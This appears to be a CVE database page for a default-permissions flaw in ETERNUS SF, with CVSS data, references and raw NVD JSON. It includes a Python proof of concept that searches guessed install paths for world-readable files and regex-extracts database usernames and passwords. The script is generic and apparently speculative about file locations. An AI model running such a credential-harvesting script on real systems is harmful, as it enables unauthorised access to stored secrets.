CVE-2025-62577

Description

ETERNUS SF provided by Fsas Technologies Inc. contains an incorrect default permissions vulnerability. A low-privileged user with access to the management server may obtain database credentials, potentially allowing execution of OS commands with administrator privileges.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ETERNUS SF Manager 16.9 及之前版本

ETERNUS SF Manager 17.x（受影响版本范围需参考官方公告）

ETERNUS SF Express 16.9 及之前版本

ETERNUS SF Storage Cruiser（受影响版本）

ETERNUS SF AdvancedCopy Manager（受影响版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62577 PoC - ETERNUS SF Default Permissions Vulnerability
# This PoC demonstrates how a low-privileged user can exploit
# incorrect default permissions to obtain database credentials

import os
import sys

# Step 1: Search for ETERNUS SF configuration files with weak permissions
def find_eternus_config():
    """
    Search for ETERNUS SF configuration files containing database credentials
    Common locations include:
    - /opt/FJSVsf/*/config/
    - /etc/FJSVsf/
    - C:\Program Files\ETERNUS_SF\*
    """
    search_paths = [
        "/opt/FJSVsf",
        "/etc/FJSVsf",
        "/var/opt/FJSVsf",
    ]
    config_files = []
    for path in search_paths:
        if os.path.exists(path):
            for root, dirs, files in os.walk(path):
                for f in files:
                    fpath = os.path.join(root, f)
                    # Check if file is world-readable (insecure default)
                    mode = oct(os.stat(fpath).st_mode)[-3:]
                    if mode[-1] in '4567':  # world-readable
                        config_files.append(fpath)
    return config_files

# Step 2: Extract database credentials from config files
def extract_credentials(config_path):
    """
    Attempt to read database credentials from misconfigured files
    """
    credentials = {}
    try:
        with open(config_path, 'r', encoding='utf-8', errors='ignore') as f:
            content = f.read()
            # Look for common credential patterns
            import re
            user_match = re.search(r'(?:user|username|db_user)\s*[=:]\s*["\']?(\w+)["\']?', content, re.IGNORECASE)
            pass_match = re.search(r'(?:password|passwd|db_pass)\s*[=:]\s*["\']?([^"\'\s]+)["\']?', content, re.IGNORECASE)
            if user_match:
                credentials['username'] = user_match.group(1)
            if pass_match:
                credentials['password'] = pass_match.group(1)
    except PermissionError:
        print(f"[-] Permission denied: {config_path}")
    return credentials

# Step 3: Main exploitation chain
def exploit():
    print("[*] CVE-2025-62577 - ETERNUS SF Default Permissions Exploit")
    print("[*] Searching for misconfigured ETERNUS SF files...")

    config_files = find_eternus_config()

    if not config_files:
        print("[-] No accessible config files found")
        return

    for cf in config_files:
        print(f"[+] Found accessible file: {cf}")
        creds = extract_credentials(cf)
        if creds:
            print(f"[+] Extracted credentials: {creds}")
            # Step 4: Use credentials to execute OS commands via DB
            # This would typically involve connecting to the database
            # and using features like xp_cmdshell or similar
            print("[!] Database access obtained - OS command execution possible")
            break

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62577
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62577
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62577/
[4] VulDB https://vuldb.com/cve/CVE-2025-62577
[5] https://jvn.jp/en/jp/JVN44266462/
[6] https://www.fsastech.com/ja-jp/resources/security/2025/1020.html
[7] https://www.fujitsu.com/global/support/products/computing/storage/20251020/index.html
[8] https://security.ts.fujitsu.com/ProductSecurity/content/FsasTech-PSIRT-FTI-STR-2025-102005-Security-Notice.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62577", "sourceIdentifier": "[email protected]", "published": "2025-10-20T06:15:36.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ETERNUS SF provided by Fsas Technologies Inc. contains an incorrect default permissions vulnerability. A low-privileged user with access to the management server may obtain database credentials, potentially allowing execution of OS commands with administrator privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN44266462/", "source": "[email protected]"}, {"url": "https://www.fsastech.com/ja-jp/resources/security/2025/1020.html", "source": "[email protected]"}, {"url": "https://www.fujitsu.com/global/support/products/computing/storage/20251020/index.html", "source": "[email protected]"}, {"url": "https://security.ts.fujitsu.com/ProductSecurity/content/FsasTech-PSIRT-FTI-STR-2025-102005-Security-Notice.pdf", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}